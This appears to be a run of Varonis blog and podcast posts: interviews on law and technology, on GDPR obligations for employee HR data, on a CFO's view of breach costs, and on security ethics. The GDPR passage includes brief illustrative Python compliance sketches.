A simple search online and you'll find a multitude of reasons why the law is slow to catch up with technology: lawyers are risk averse, the legal world is intentionally slow, and it's also a late adopter of technology. Can this all be true? Or is it simply hearsay?
I wanted to hear from an expert who has experience in the private and public sector. That's why I sought out the expertise of Camille Stewart, a cyber and technology attorney.
In part one of our interview, we talk about the tension between law and tech. And as it turns out, laws are built in the same way a lot of technologies are built: in the form of a framework. That way, it leaves room and flexibility so that technology can continue to evolve.
Tech people want the law to catch up with technology. Lawyers wish tech people would understand the law a little bit more. And some have even criticized that the law doesn't move as quickly as technology. You have a lot of experience both as a cybersecurity attorney in Washington and in the private sector.
And I'm wondering if there's a deeper divide between the two entities, and I'm wondering if you can share your experience with us in working with lawmakers as well as your experience in the private sector.
You want the law to leave room and flexibility so that technology can continue to evolve. And so that's kind of what has to happen. It's frustrating that there are no legal recourses when an issue comes up, but you almost have to test those boundaries to figure out a framework that fits the bill to address the issues that are coming.
So even the laws that we do build tend to be framework because we need to leave room for that innovation and ideation. And part of the tension between technology communities and lawyers and technology communities and the general public or the government is trust. So technologists don't trust the government with the information that they have, and the government wants to build that trust desperately so that we can leverage the resources that are at the disposal of both.
You know, the government has a lot of insight and intelligence that they can layer over the tools and capabilities in the private sector, and if they came together it would be great, but there's a base level of trust and understanding of what each is trying to do that's missing; if we could bridge that gap, so much more could be done.
Organizations like DHS that work with the private sector quite a bit are trying to build those bridges and find ways to share information in a way that's valuable to both the private sector and the government through things like AIS, the Automated Indicator Sharing system. And it's gonna be a slow process.
Those trusts are bolted tight.
Private sector has coalesced together to build trust circles with their peers and people that they know doing work that they understand, and they're sharing information that way. And those mechanisms have become pretty robust and helpful, but the government has to be able to be a part of that for us to really complete the picture, and that's the work that's being done, some through non-profit organizations, NGOs, but also through the government and the private sector starting to get into a room.
And then, as people move back and forth across lines, right, traditionally people were govies for life, or they were in the private sector. Now there's more movement back and forth, and that'll help build the trust as well.
And then technologists, on the other hand, need to be willing to have those conversations and those explanations and understand that lawyering of the past, there was the perception that lawyers were just gonna say no. Right? They're risk averse, they aren't gonna let you ideate and innovate, they're just gonna shut it down. And that's not really true.
My job as a lawyer, and the job of lawyers at companies today, especially if they deal with technology and cyber issues, is to lay out the risk, understand the organization's risk calculus, and put the information in front of leadership so that they can make an informed decision, and then help to build a path forward that calculates those risks, that mitigates those risks to the best of their ability, and to be ready to support the company in what they've done.
So, with that base level of understanding and the willingness to do the work to understand, lawyers can be great assets to technologists because they can be translators between different communities, as well as help the company build out and understand what its risk posture is. It's important to have all key stakeholders as part of that discussion, and lawyers are definitely part of that group.
And had you accounted for more perspective on the front end in a proactive way, it would have mitigated some of the risk on the back end or you would have been able to right yourself more quickly.
And so I think watching that occur has prompted a number of organizations to build frameworks that help get the right people in the room, and has encouraged people to do the work to figure out where different players fall in the conversations an organization is having about how its security is evolving and how technology will be used and integrated. But I think that outside factors, in this area of law and cyberspace evolving, have done a lot of the work to encourage the collaboration that's needed.
In April of 2013, after a short stint as a professional baseball player, Sean Campbell started working at Varonis as a Corporate Systems Engineer.
Currently a Systems Engineer for New York and New Jersey, he is responsible for uncovering and understanding the business requirements of both prospective and existing customers across a wide range of verticals. This involves many introductory presentations, proof-of-concept installations, integration expansion discussions, and even the technical development of Varonis channel partners. Sean also leads a team of subject matter experts (SMEs) for our innovative DatAlert platform.
According to his manager Ben Lui:
"Sean Campbell is one of the most talented engineers on my team. He is the regional DatAlert SME and has bridged valuable feedback from both customers and the field back to product management. Sean is also an excellent team player and excels at identifying critical data exposure during customer engagements. Overall, Sean is a key contributor to the Varonis organization."

The fast-paced environment, the challenge of data security, and the fact that the sales cycle is far from "cookie cutter" are what Sean enjoys most about his role here. He also values the relationships he has been able to build over the years on both the Varonis and customer sides.
Data protectionism - restricting the movement of data between countries - is an option that governments may elect to implement in the coming months and years. As the world economy becomes more data-driven, impacting global GDPs, these restrictions will soon find their way into trade deals, requiring data to be held on servers inside certain countries.
It’s not just a business decision. Exporting data on individuals is also heavily restricted because of privacy concerns. And we saw a Belgian legislator voice this concern during a discussion with Facebook’s CEO on his value as a user.
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Mike Thompson, Mike Buckbee
Outsourcing tedious tasks is a dream of many and at the latest Google Developer’s conference, the audience beamed when Google Assistant booked an appointment. However, attendees were quick to worry about potential exploits those devices might face.
Medical devices are a good example of what computerized assistants might face in the future. Yes, medical devices can save lives and certainly serve a more noble cause than outsourcing tedious tasks, but even these life-saving pacemakers and defibrillators still require security firmware updates.
Seems that we still haven’t learned our lesson: embed security at the initial stages of design.
Other articles discussed:
If you’ve ever seen Technical Evangelist Brian Vecci present, his passion for Varonis is palpable. He makes presenting look effortless and easy, but as we all know excellence requires a complete devotion to the craft. I recently spoke to him to gain insight into his work and to shed light on his process as a presenter.
“When I first started presenting for Varonis, I’d have the presentation open on one half of the screen and Evernote open on the other half and actually write out every word I was going to say for each slide,” said Brian.
From there, he improvises from the script.
“I’d often change things up while presenting based on people’s reactions or questions, but the process of actually writing everything out first made responding and reacting and changing the presentation a lot easier. I still do that, especially for new presentations.”
According to Varonis CMO David Gibson:
Brian's high energy, curiosity, and multi-faceted skills - technical aptitude, communication skills, sales acumen, and organizational capabilities - make him an exceptional evangelist.
Sara Jodka is an attorney with Columbus-based Dickinson Wright. Her practice covers both data privacy and employment law, so she's in a perfect position to help US companies understand how the EU General Data Protection Regulation (GDPR) handles HR data. In the second part of our interview, Sara talks about the relationship between HR data and Data Protection Impact Assessments (DPIAs). Most companies will likely have to take the extra step and perform these DPIAs, and there are specific triggers that Sara delves into.
Sara Jodka: Thank you for having me.
IOS: I wanted to get into an article that you had posted on your law firm's blog. It points out an interesting subcategory of GDPR personal data which doesn't get a lot of attention, and that is employee HR records. You know, of course it's going to include ethnic, payroll, 401(k), and other information.
So can you tell us, at a high level, how the GDPR treats employee data held by companies?
SJ: Whenever we're looking at it, none of the articles say that all of these people have these rights. All these individuals have rights! None of them say, "Well, these don't apply in an employment situation." So we don't have any exclusions!
We're led to "Yes, they do apply." And so we've been waiting on, and we have been working with guidances that we're receiving, you know, from the ICO, with respect to …. consent obligation, notice obligation, portability requirements, and any employee context. Because it is going to be a different type of relationship than the consumer relationship!
IOS: It's kind of interesting that people, I think, or businesses, probably are not aware of this ... except those who are in the HR business.
So I think there's an interesting group of US companies that would find themselves under these GDPR rules that probably would not have initially thought they were in this category because they don't collect consumer data. I'm thinking of law firms, investment banking, engineering, professional companies.
They thought, "Well, because we don't actually have a physical location in the EU, it doesn't actually cover us." That's not actually true at all.
The GDPR covers people that are working in the EU, people who reside in the EU, so to the extent that a U.S. company has employees that are working in the EU, it is going to cover that type of employee data. And there's no exception in the GDPR around it. So it's going to include those employees.
IOS: So I hadn't even thought about that. So their records would be covered under the GDPR?
SJ: Yeah, the one thing about the definition of a data subject under the GDPR is it doesn't identify that it has to be an EU resident or it has to be an EU citizen. It's just someone in the EU.
When you're there, you have these certain rights that are guaranteed. And that will cover employees that are working for U.S. companies but they're working in the EU.
IOS: Right. And I'm thinking perhaps of U.S. citizens who come there for some assignment, maybe working out of the office; they would be covered under these rules.
SJ: And that's definitely a possibility, and that's one thing that we've been looking for. We've been looking for guidance from the ICO to determine … the scope of what this is going to look like, not only in an employment situation, but when we're dealing with an immigration situation, somebody on a work visa, and also in the context of schools, as we have, you know, different students coming over to the United States or going abroad. And what protection the GDPR then applies to those kinds of in-transition relationships, those employees or students.
With a lot of my clients, we are trying to err on the side of caution and so do things ahead of time, rather than beg forgiveness if the authorities come knocking at our door.
IOS: In that article, you mentioned that the processing of HR records has additional protections under the GDPR … An employee has to give consent explicitly and freely, and not as part of an employer-employee contract.
GDPR's Article 6 says there are only six lawful ways to process data. If you don't obtain freely given consent, then it gets tricky.
Can you explain this? And then, what does an employer have to do to process employee data especially HR data?
SJ: Well, when we're looking at the reasons that we're allowed to process data, we can do it by consent, and we can also do it if we have a lawful basis.
A number of the lawful bases are going to apply in the employer context. One of those is if there is going to be an agreement. You know, in order to comply with the terms of a contract, like a collective bargaining agreement or like an employment agreement. So hire/fire payroll data would be covered under that, also if there is … a vital interest of an employee.
There's speculation that that exception might actually be, or that legitimate basis might be used to obtain vital information regarding, like, emergency contact information of employees.
And another one of the lawful bases is if the employer has a legitimate interest in the data that isn't outweighed by the rights of the data subject, the employee.
The issue, though, is that most of what we talk about is consumer data, and we're looking a lot at consent and what consent actually looks like in terms of express consent, you know, having them check the box or whatever.
In an employee situation, the [UK's] ICO has come out with guidance with respect to this. And they have expressly said that in an employee-employer relationship there is an inherent imbalance of bargaining power, meaning an employee can never really consent to giving up their information because they have no bargaining power. They either turn it over, or they're not employed. The employer is left to rely only on the other lawful bases to process data, excluding consent, so the contract allowance and some of the others.
But the issue I have with that is, I don't think that that's going to cover all the data that we actually collect on an employee, especially employees who are operating outside the scope of a collective bargaining agreement.
In a context of, say, an at-will employee where there is that ... where that contract exception doesn't actually apply. I think there will be a lot of collection of data that doesn't actually fall under that. It may fall into the legitimate interest, if the employer has the forethought to actually do what's required, which is to actually document the process of weighing the employer's interest against the interest of the employee, and making sure that that is a documented process. [ Read the UK's ICO guidelines on the process of working out legitimate interest.]
When employers claim a legitimate interest exception to getting employee consent, they have more work to do. [Source: UK ICO]

But also what comes with that is the notice requirement, and the notice requirement is not something that can be waived. So employers, if they are doing that, are going to have to — and this is basically going to cover every single employer — they're going to have to give their employees notice of the data that they are collecting on them, at a minimum.
IOS: At a minimum. I think to summarize what you're saying is it's just so tricky or difficult to get what they call freely given consent, that most employers will rely on legitimate interest.
SJ: I think that's required when we're dealing with sensitive data, and we're talking about sensitive HR data. A DPIA has to be performed when two of the following exist, and there are like nine things on that list that can require a DPIA to be done. But you bring up a great point, because the information that an employer is going to have is going to necessarily trigger the DPIA. [See these Working Party 29 guidelines for the nine criteria that Sara refers to.]
The DPIA isn't triggered by us doing the legitimate basis ...
and having to document that process. It's actually triggered because we process sensitive data. You know, their trade union affiliation, their religious data, their ethnicity. We have sensitive information, which is one of the nine things that can trigger it, and all you need is two to require a DPIA.
Another one that employers always get is they process data of a vulnerable data subject. A vulnerable data subject includes employees.
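To make the trigger rule concrete: a DPIA is needed once two of the nine Working Party 29 criteria apply, and for HR data the "sensitive data" and "vulnerable data subjects" criteria alone usually get you there. Here is a minimal, purely illustrative Python sketch of that check (the criterion names are paraphrased for readability, not official GDPR text):

# Hypothetical sketch: a DPIA is generally required when processing meets
# two or more of the WP29 criteria (names paraphrased, not official text).
WP29_CRITERIA = [
    "evaluation_or_scoring",
    "automated_decision_with_legal_effect",
    "systematic_monitoring",
    "sensitive_or_highly_personal_data",
    "large_scale_processing",
    "matching_or_combining_datasets",
    "vulnerable_data_subjects",      # employees count as vulnerable subjects
    "innovative_technology",
    "prevents_exercise_of_rights",
]

def dpia_required(criteria_met: set[str]) -> bool:
    """Return True when two or more WP29 criteria apply."""
    return len(criteria_met & set(WP29_CRITERIA)) >= 2

# Typical HR example from the interview: sensitive data plus employees as
# vulnerable data subjects already crosses the threshold.
print(dpia_required({"sensitive_or_highly_personal_data",
                     "vulnerable_data_subjects"}))  # True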
IOS: Okay. Right.
SJ: I can't imagine a situation where an employer wouldn’t have to do a DPIA. The DPIA is different than the legitimate interest outweighing [employee rights] documentation that has to be done. They're two different things.
IOS: So, they will have to do the DPIAs? And what would that involve?
SJ: Well, it's one thing that's required for high-risk data processing and that, as we just discussed, includes the data that employer has.
Essentially, what a DPIA is, it's a process that is designed to describe what processing the employer does, assess its necessity and proportionality, and help manage the risks to the rights and freedoms of natural persons resulting from the processing of personal data, by assessing and determining the measures to address the data and the protections around it.
It's a living document, so one thing to keep in mind about DPIA is they're never done. They are going to be your corporation's living document of the high-risk data you have and what's happening with it to help you create tools for accountability and to comply with the GDPR requirements including, you know, notice to data subject, their rights, and then enforcing those rights.
It's basically a tracking document ... of the data, where the data's going, where the data lives, and what happens with the data and then what happens when somebody asks for their data, wants to erase their data, etc.
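Since Sara describes the DPIA as a living tracking document, one way to picture it is as a register with one record per high-risk processing activity. The Python sketch below is only an illustration of that idea; the field names are hypothetical and not prescribed by the GDPR:

from dataclasses import dataclass, field

@dataclass
class DpiaRecord:
    """One entry in a living DPIA register: what is processed, where it
    lives, where it flows, and how data-subject requests are handled."""
    processing_activity: str
    data_categories: list[str]
    storage_locations: list[str]
    recipients: list[str]
    lawful_basis: str
    risks_and_mitigations: dict[str, str] = field(default_factory=dict)
    erasure_procedure: str = "unspecified"

# Hypothetical example for EU employee payroll data
hr_payroll = DpiaRecord(
    processing_activity="EU employee payroll",
    data_categories=["salary", "bank details", "trade union membership"],
    storage_locations=["HR SaaS (EU region)", "finance file share"],
    recipients=["payroll provider"],
    lawful_basis="contract / documented legitimate interest",
)
print(hr_payroll.processing_activity)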
SJ: I think one of the most interesting points, whenever I was doing my research, to really drill down, from my knowledge level, is you're allowed to process data so long as it's compliant with a law. You know, there's a legal necessity to do it.
And a lot of employers, U.S. employers specifically, look at this and think, "Great, that legal requirement takes the load off of me because I need, you know, payroll records to comply with the Fair Labor Standards Act and, you know, state wage laws. I need my immigration information to comply with immigration control requirements."
You know, they were like, "We have all these U.S. laws for why we have to retain information and why we have to collect it." Those laws don't count, and I think that's a big shock when I say, well, those laws don't count.
We can't rely on U.S. laws to process EU data!
We can only rely on EU laws and that's one thing that's brought up and kind of coincides with Article 88, which I think is an interesting thing.
If you look at Article 88 when they're talking about employee data, what Article 88 does is it actually allows member states to provide for more specific rules to ensure that the protections and the freedoms of their data are protected.
These member states may be adding on more laws and more rights than the GDPR already provides! Another thing is, not only do we have to comply with EU law, but we also are going to have to comply with member states' other specific laws that may be narrower than the GDPR.
Employers can't just look at the GDPR, they're going to also have to look at if they know where a specific person is. Whether it's Germany or Poland. They're going to have to look and see what aspects of the GDPR are there and then what additional, more specific laws that member state may have also put into effect.
IOS: Right!
SJ: So, I think that there are two big legal issues hanging out there that U.S. multinational companies...
IOS: One thing that comes to my mind is that there are fines involved for not complying with this. And that includes, of course, doing these DPIAs.
SJ: The fines are significant. I think that's the easiest way to put it: the fines are astronomical. I mean, they're not fines that we're used to seeing. There are two levels of fines depending on the violation, and they can be up to 4% of a company's annual global turnover, or 20 million euros. If you look at it in U.S. dollar terms, you're looking at, like, $23 million at this point.
For some companies, that's a game changer; that's a company shut down. Some companies can withstand that, but some can't. And I think any time you're facing a $23 million penalty, the cost of compliance is probably going to be outweighed by the potential penalty.
Especially because these aren't necessarily one-time penalties and there's nothing that's going to stop the Data Protection Authority from coming back on you and reviewing again and assessing another penalty if you aren't in compliance and you've already been fined once.
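To put the two fine tiers Sara mentions into numbers, here is a minimal Python sketch of the "greater of" calculation (the GDPR's upper tier is 4% of annual global turnover or 20 million euros, the lower tier 2% or 10 million euros; the dollar equivalent will vary with exchange rates):

def max_gdpr_fine(annual_global_turnover_eur: float, upper_tier: bool = True) -> float:
    """Upper-tier violations: greater of 4% of turnover or EUR 20M.
    Lower-tier violations: greater of 2% of turnover or EUR 10M."""
    if upper_tier:
        return max(0.04 * annual_global_turnover_eur, 20_000_000)
    return max(0.02 * annual_global_turnover_eur, 10_000_000)

# A company with EUR 2B turnover faces up to EUR 80M, not the EUR 20M floor.
print(max_gdpr_fine(2_000_000_000))  # 80000000.0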
I think the issue is going to be how far the reach is going to be for U.S. companies. I think for U.S. companies that have, you know, brick and mortar operations in a specific member state, I think enforcement is going to be a lot easier for the DPA.
There's going to be a greater disadvantage to, actually, enforcement for, you know, U.S. companies that only operate on U.S. soil.
Now, if they have employees that are located in the EU, I think that enforcement is going to be a little bit easier, but if they don't and they're merely just, you know, attracting business via their website or whatever to EU, I think enforcement is gonna be a little bit more difficult, so it's going to be interesting to see how enforcement actually plays out.
IOS: Yeah, I think you're referring to the territorial scope aspects of the GDPR. Which, yeah, I agree that's kind of interesting.
SJ: I guess my parting advice is this isn't something that's easy, it's something that you do need to speak to an attorney. If you think that it may cover you at all, it's at least worth a conversation. And I've had a lot of those conversations that have lasted, you know, a half an hour, and we've been very easily able to determine that GDPR is not going to cover the U.S. entity.
And we don't have to worry about it. And some we've been able to identify that the GDPR is going to touch very slightly and we're taking eight steps, you know, with the website and, you know, with, you know, on site hard copy documents to make sure that proper consent and notice is given in those documents.
So, sometimes it's not going to be the earth-shattering compliance overhaul of a corporation that you think the GDPR may entail, but it's worth a call with a GDPR attorney to at least find out, so that you can sleep better at night, because this is a significant regulation, it's a significant piece of law, and it is going to touch a lot of U.S. operations.
IOS: Right. Well, I want to thank you for talking about this somewhat overlooked area of the GDPR.
SJ: Thank you for having me.
In part two of my interview with Varonis CFO & COO Guy Melamed, we get into the specifics with data breaches, breach notification and the stock price.
What's clear from our conversation is that you can no longer ignore the risks of a potential breach. There are many ways you can reduce risk, but if you choose not to take action, at the very least have a conversation about it.
Also, around 5:11, I asked a question about IT pros who might need some help getting budget. There’s a story that might help.
So we've seen companies that have gone out of business because of breaches. We've seen companies that will have to deal with litigation for years ahead. So where's that factored in? There's just so many components. It's more of a philosophy that if you can do something active to try and minimize risk, then why not do it?
I think companies, more from a philosophical perspective, should try to actively take action to minimize risk. And companies that believe it won't affect them and that they're going to be okay are, I think, acting slightly irresponsibly.

So a company would obviously rather try to identify breaches as soon as possible, so it can take action, minimize some of the cost, and be transparent with the customers, the investors, and the shareholders.
GDPR definitely changes the reporting requirement, and if you're breached, you have to provide that information within 72 hours. That's a short period of time, and in order to be able to comply with that regulation, and in order to have better tracking, you really have to have systems, programs, personnel in place to try to identify this.
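As a back-of-the-envelope illustration of the 72-hour window Guy mentions, the clock runs from the moment the company becomes aware of the breach (a simplified reading of the GDPR's notification rule, shown here only as a sketch):

from datetime import datetime, timedelta

def notification_deadline(became_aware: datetime) -> datetime:
    """GDPR breach notifications are due within 72 hours of awareness."""
    return became_aware + timedelta(hours=72)

aware = datetime(2018, 5, 28, 9, 0)          # hypothetical detection time
print(notification_deadline(aware))           # 2018-05-31 09:00:00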
And the fines that come from GDPR, I'm talking about, you know, some of the requirements and some of the fines related to those requirements, are 4% of global revenue or $25 million, whichever is greater. That's a huge number that could affect companies in so many ways, definitely something that from our perspective what we see is causing a lot of interest, causing a lot of discussion, and companies are not ignoring the regulation because of its significance.
There are so many other components that thinking you can be okay just by being breached and paying the fine is definitely not the approach that I would like to take as the company's CFO. I would definitely try to act in a way that minimizes the risk, long term and short term.
And during a discussion, he was asked, "What is the best way to get budget, in order to get the Varonis product or any other product for that matter that can protect the company in the long term?"
And his response was, "Make sure the risk assessment, the evaluation and whatever you're doing in that demo is done on the finance documents. If the finance personnel, if the CFO can see how many people have access to the financial statements or any other sensitive information within his folders or her folders and have access to information they shouldn't have access to, you'll find the budget, they'll find the budget."
So that's definitely something that I could relate to, because if I saw risk on files that I know team members shouldn't have access to, we could move things around within the budget to purchase something that wasn't necessarily budgeted initially, once I can quantify the risk in my mind.
And people could live with the risk. But I don't think people, after all the breaches that have taken place and the amount of risk that companies are dealing with, can ignore it anymore. I think they have to take measures, think about it, or at least have a discussion. If they decide that they want to live with the risk, it should definitely be done after a discussion with the legal department, the HR department, the CEO, CFO, and CISO. If all parties agree that the risk is not worth taking any action on, then at least you had a conversation.
But if it's decided by one person within the organization and it's not shared between the different departments, between the different roles that would eventually be responsible, then I think that's just not good practice.
When I asked our podcast panelists about the difficulty of discerning real businesses from fake ones, or of answering seemingly innocuous security questions about your first pet, they agreed it can be time-consuming, mentally exhausting, and not naturally intuitive.
As technology gets even more difficult to navigate, think about how important it is when presenting time-to-value security solutions to C-Suite executives.
A popular catchphrase amongst IT pros is: "It's a no-brainer." When an idea is presented as a no-brainer, it's assumed to have obvious value, even though processes and strategic decisions are usually more complicated than they appear.
So when it comes to cybersecurity, not everything is a no-brainer. Far from it. If it were simple, Atlanta wouldn't have spent $2 million to recover from a ransomware attack, and the cyberinsurance market wouldn't have brought in $3.5 billion in premiums globally in 2016.
Other articles discussed: Monkey loses selfie copyright case
Tool of the week: Algo
Panelists: Cindy Ng, Kilian Englert, Kris Keyser, Mike Buckbee
Sara Jodka is an attorney with Columbus-based Dickinson Wright. Her practice covers both data privacy and employment law, so she's in a perfect position to help US companies understand how the EU General Data Protection Regulation (GDPR) handles HR data. In this first part of the interview, we learn from Sara that some US companies will be in for a surprise when they discover that all the GDPR security rules apply to internal employee records. The GDPR's consent requirements, though, are especially tricky for employees.
Recently, the SEC issued guidance on cybersecurity disclosures, requesting that public companies report data security risks and incidents that have a "material impact" and that reasonable investors would want to know about.
How does the latest guidance impact a CFO's responsibility in preventing data breaches? Luckily, I was able to speak with Varonis CFO and COO Guy Melamed to get his perspective.
In part one of my interview with Guy, we discuss the role a CFO has in preventing insider threats and cyberattacks and why companies might not take action until they see how vulnerable they are with their own data.
The interview is well worth your time: by the end of the podcast, you'll have a better understanding of what IT pros, finance, legal, and HR have on their minds.
Right now, data breaches are one of the biggest threats that all companies face, and companies are realizing this and increasingly delegating responsibilities to the CFO. According to a survey by the American Institute of CPAs, 72% of companies have asked the finance department to take on more responsibility for dealing with data breaches and attacks. Why should the CFO be involved in protecting the organization's most sensitive data?
So, that kind of created the guidance that was provided to all of the Big Four accounting firms, and private, and especially public, companies have to address that. That release talks about what the company is doing from a risk management perspective, how it is protecting against cybersecurity threats. It talks about the board's role in overseeing the management of any material cybersecurity risk. And it has a lot of discussion as to what type of disclosure needs to be provided in what event. So, when we received that publication in preparation for our 10-K filing, we had to have a discussion: where to put it, what is the risk, how are we addressing it. A conversation like that takes place with the legal department. It takes place even with the HR department, with some of the regulation around protecting data. So, there are a lot of components that relate to the CFO's role in making sure that we address it properly.
So, I think that's step number one. There's additional risks that take place on a day to day, and if I've given you an example from the finance department, if an employee is on warning, goes through a PIP, and he has access to sensitive information, you wanna make sure that that information that he has access to stays within the company, and that an employee isn't accessing more and more information in preparation for departure. So, that's a risk that relates to the finance organization, but relates to so many other departments as well. There's IP that, you know, personnel within the R&D department wanna make sure is protected. There's obviously information related to customers and payroll information and HR and legal and the list just goes on and on. So, the desire is first of all just to be able to know what you need to protect and then who's protecting it, who has access to it and being able to see any abnormal behavior that's taking place within an organization.
So, one of the examples that we see during a selling process is that if we sit down to show that risk assessment, or even have an initial conversation with someone from IT or a CISO, and also with a legal department member or a finance member, and we ask one simple question, "If 10,000 files were deleted today, would you know about it?", the answer from the CISO or from the IT personnel is, "Absolutely not. We don't have any ability to know if someone deleted 10,000 files."
But if you ask a finance person or someone from the legal department or HR, I think their automatic reaction would be that there has to be a way, and that it seems unreasonable that a company isn't tracking whether 10,000 files got deleted today. That, I believe, is one of the gaps that has to be bridged, and the education from the finance side is making sure that you know what the company is tracking and what it isn't tracking, and, if an employee is about to leave, whether we have any type of monitoring to make sure that sensitive files aren't taken and provided to a competitor, or even used in the future by what would then be an ex-employee.
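The 10,000-deleted-files question is, at its core, a threshold alert on file-activity events. Here is a deliberately simple, hypothetical Python sketch of that idea; the event format and threshold are assumptions for illustration, not a description of any particular monitoring product:

from collections import Counter
from datetime import date

# Hypothetical audit events: (user, action, date)
events = [
    ("jsmith", "delete", date(2018, 4, 2)),
    ("jsmith", "delete", date(2018, 4, 2)),
    ("mlee",   "read",   date(2018, 4, 2)),
    # ... imagine thousands more rows from a file-activity log
]

DELETE_ALERT_THRESHOLD = 10_000  # tune to what counts as "abnormal" for your org

def users_over_threshold(events, day):
    """Count deletions per user for one day and flag anyone over the threshold."""
    deletes = Counter(user for user, action, d in events
                      if action == "delete" and d == day)
    return {user: n for user, n in deletes.items() if n >= DELETE_ALERT_THRESHOLD}

print(users_over_threshold(events, date(2018, 4, 2)))  # {} until someone mass-deletes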
So, there's a lot of components on the daily operations. There's a lot of risks that company has to think about and always kind of go through the process of what can go wrong. Maybe it hasn't happened and maybe everything is good now and we trust all of our employees, but what if? And I think the notion that when you have organizations with 1,000 employees or 20,000 employees or 50,000 employees, the notion that all of the employees are ethical is a bit scary and you have to think how to protect the company in the best way.
Meanwhile, finance, legal, and HR, they think, "Oh, hasn't that problem been already solved? It's a little unreasonable," as you've said, "if we weren't able to figure that out."
So, let's talk about the cost of a breach. It's been said that the average cost of a data breach is about $4 million, and there are many organizations that have paid tens of millions of dollars. What are some direct and indirect costs to businesses associated with data breaches?
What I would think about is would a CFO, or a COO for that matter, be comfortable with providing their financial statements to a competitor two weeks before they were published? Obviously the answer is, no, and there could be detrimental consequences to that type of breach.
But the breach isn't just about the financial information. There is customer information, there is payroll information. There are just so many sensitive files that sit there that people within the organization have access to, and it doesn't necessarily mean that they would break bad. It could be a situation where someone from the outside took control of an employee's credentials and starts using that access in the wrong way. So, the notion, and I think what we've seen as a company, as one of the most interesting phenomena, is that some of the breaches that took place in 2014 really generated a knee-jerk reaction, and there was significant IT spend during the beginning of 2015. But that spend at the beginning of the year was mostly toward perimeter defense security. The notion was that if you're protecting the border, you'll be okay. And I think what's been proven day in, day out is that perimeter defense security is absolutely important, but the notion that that's the only type of defense you need has been thrown out the window.
And if you use the same analogy of border patrol or protecting a country, the fact that you have protection on the border doesn't mean that you don't have any other measures and any other organizations that protect you from the inside. Because at one point there is gonna be someone that will be able to overcome that border. Not only that, how are you protecting your organization or your country from people from the inside? So, what we've seen in the last couple years is that the amount of breaches that have taken place have increased significantly. The magnitude has increased significantly, the implications on those companies has increased significantly.
And I know there was an article a couple of years ago that discussed the cost of a breach and argued you shouldn't buy any software and can just deal with a breach. That notion has been thrown out the window, and, you know, it's obvious that the consequences of a breach, we see it on the news and on the front page of The Wall Street Journal and The Financial Times. It's happening at rates we haven't seen before, and I don't see that going away.
In part two of my interview with Delft University of Technology’s assistant professor of cyber risk, Dr. Wolter Pieters, we continue our discussion on transparency versus secrecy in security.
We also cover ways organizations can present themselves as trustworthy. How? Be very clear about managing expectations. Declare your principles so that end users can trust that you'll be acting on the principles you advocate. Lastly, have a plan for what to do when something goes wrong.
And of course there's a caveat: Wolter reminds us that there's also a very important place in this world for ethical hackers. Why? Not all security issues can be solved during the design stage.
Privacy, but then again, I think privacy is a bit overrated. This is really about power balance. It's because everything we do in security will give some people access and exclude other people, and that's a very fundamental thing. It's basically about the power balance that, through security, we embed into technology. And that is what fundamentally interests me in relation to security and ethics.
So, algorithms that were secrets, trade secrets, etc., being broken the very moment the algorithm became known. So, in that sense, I think most researchers would agree this is good practice. On the other hand, it seems that there's also a certain limit to what we want to be transparent about, both in terms of security controls; we're not giving away every single thing governments do in terms of security online. So, there is some level of security by obscurity there, and more generally, to what extent is transparency a good thing? This again ties in with who is a threat. I mean, we have the whole WikiLeaks endeavor, and some people will say, "Well, this is great. The government shouldn't be keeping all that stuff secret." So, it's great for trust that this is now all out in the open. On the other hand, you could argue all this is actually a threat to trust in the government. So, this form of transparency would be very bad for trust.
So, there's clearly a tension there. Some level of transparency may help people trust in the protections embedded in the technology and in the actors that use those technologies online. But on the other hand, if there's too much transparency, all the nitty-gritty details may actually decrease trust. You see this all over the place. We've seen it with electronic voting as well. If you provide some level of explanation of how certain technologies are being secured, that may help. If you provide too much detail, people won't understand it and it will only increase distrust. There is a kind of golden middle there in terms of how much explanation you should give to make people trust in certain forms of security, encryption, etc. And again, in the end, people will have to rely on experts, because with physical forms of security, physical ballot boxes, it's possible to explain how these work and how they are being secured; with digital, that becomes much more complicated, and most people will have to trust the judgment of experts that these forms of security are actually good, if the experts believe so.
It's not only that it's possible to change your privacy settings, to regulate the access that other users of the social networking service have to your data; at the same time, you need to be crystal clear about how you as a social network operator are using that kind of data. Because sometimes I get the sense that the big internet companies are offering all kinds of privacy settings which give people the impression that they can do a lot in terms of their privacy, but, yes, this is true for inter-user data access, while the provider still sees everything. This seems to be a way of framing privacy in terms of inter-user data access. Whereas I think it's much more fundamental what these companies can do with all the data they gather from all their users, and what that means in terms of their power and the position that they get in this whole arena of cyberspace.
So, managing expectations. I mean, there are all kinds of different standpoints, based on different ethical theories and different political points of view, that you could take in this space. If you want to behave ethically, then make sure you list your principles, you list what you do in terms of security and privacy to adhere to those principles, and make sure that people can actually trust that this is also what you do in practice. And also make sure that you know exactly what you're going to do in case something goes wrong anyway. We've seen too many breaches where the responses by the companies were not quite up to standard, delaying the announcement of the breach, for example. It's crucial to not only do some prevention in terms of security and privacy, but also to know what you're going to do in case something goes wrong.
The same for elections, there is no neutral space from which people can cast their vote without being influenced and we've seen in recent elections that actually technology is playing more and more of a role in how people perceive political parties and how to make decisions in terms of voting. So, it's inevitable that technology companies have a role in those elections and that's also what they need to acknowledge.
And then of course, and I think this is a big question that needs to be asked, "Can we prevent the situation in which the power of certain online stakeholders, whether those are companies or nation states or whatever, gets so great that they are able to influence our governments, either through elections or through other means?" That's a situation that we really don't want to be in, and I'm not pretending that I have crystal clear answers there, but this is something that at least we should consider as a possible scenario.
And then there are all these doomsday scenarios about a cyber Pearl Harbor, and I'm not sure whether those doomsday scenarios are the best way to think about this, but we should also not be naive and think that all of this will blow over, because maybe indeed we have already given away too much power in a sense. So, what we should do is fundamentally rethink the way we think about security and privacy, away from, "Oh, damn, my photos are in the hands of whoever." That's not the point. It's about the scale at which certain actors either get their hands on data or are able to influence lots of individuals. So, again, scale comes in there. It's not about our individual privacy, it's about the power that these stakeholders get by having access to the data, or by being able to influence lots and lots of people, and that's what the debate needs to be about.
Wolter Pieters: Yeah. I think that's an issue, but if that's going to happen, if people are afraid to play this role because legislation doesn't protect them enough, then maybe we need to do something about that. If we don't have people who point us to essential weaknesses in security, then what will happen is that those issues will be kept secret and they will be misused in ways that we don't know about, and I think that's a much worse situation to be in.
This week, we talk about our annual data risk assessment report and sensitive files open to every employee! 41% of companies are vulnerable. The latest findings put organizations at risk, as unsecured folders give attackers easy access to business roadmaps, intellectual property, financial and health data, and more. We also discuss how data open to everyone in an organization relates to user-generated data shared with third-party apps. Is it a data security or a privacy problem? At the very least, panelists think it’s a breach of confidence.
